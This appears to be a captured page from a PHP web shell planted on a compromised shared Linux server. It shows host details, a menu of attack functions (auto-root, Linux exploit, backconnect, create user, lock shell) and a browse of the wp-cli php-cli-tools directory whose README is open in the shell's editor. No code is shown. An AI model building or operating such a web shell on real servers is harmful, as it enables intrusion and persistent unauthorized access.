Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
wp-cli /
php-cli-tools /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.actrc
129
B
-rw-r--r--
.editorconfig
591
B
-rw-r--r--
.travis.yml
299
B
-rw-r--r--
LICENSE
1.03
KB
-rw-r--r--
README.md
2.08
KB
-rw-r--r--
composer.json
1.54
KB
-rw-r--r--
http-console.php
1.78
KB
-rw-r--r--
phpunit.xml.dist
648
B
-rw-r--r--
test.php
617
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
PHP Command Line Tools ====================== [](https://travis-ci.org/wp-cli/php-cli-tools) A collection of functions and classes to assist with command line development. Requirements * PHP >= 5.3 Suggested PHP extensions * mbstring - Used for calculating string widths. Function List ------------- * `cli\out($msg, ...)` * `cli\out_padded($msg, ...)` * `cli\err($msg, ...)` * `cli\line($msg = '', ...)` * `cli\input()` * `cli\prompt($question, $default = false, $marker = ':')` * `cli\choose($question, $choices = 'yn', $default = 'n')` * `cli\menu($items, $default = false, $title = 'Choose an Item')` Progress Indicators ------------------- * `cli\notify\Dots($msg, $dots = 3, $interval = 100)` * `cli\notify\Spinner($msg, $interval = 100)` * `cli\progress\Bar($msg, $total, $interval = 100)` Tabular Display --------------- * `cli\Table::__construct(array $headers = null, array $rows = null)` * `cli\Table::setHeaders(array $headers)` * `cli\Table::setRows(array $rows)` * `cli\Table::setRenderer(cli\table\Renderer $renderer)` * `cli\Table::addRow(array $row)` * `cli\Table::sort($column)` * `cli\Table::display()` The display function will detect if output is piped and, if it is, render a tab delimited table instead of the ASCII table rendered for visual display. You can also explicitly set the renderer used by calling `cli\Table::setRenderer()` and giving it an instance of one of the concrete `cli\table\Renderer` classes. Tree Display ------------ * `cli\Tree::__construct()` * `cli\Tree::setData(array $data)` * `cli\Tree::setRenderer(cli\tree\Renderer $renderer)` * `cli\Tree::render()` * `cli\Tree::display()` Argument Parser --------------- Argument parsing uses a simple framework for taking a list of command line arguments, usually straight from `$_SERVER['argv']`, and parses the input against a set of defined rules. Check `examples/arguments.php` for an example. Usage ----- See `examples/` directory for examples. Todo ---- * Expand this README * Add doc blocks to rest of code
Close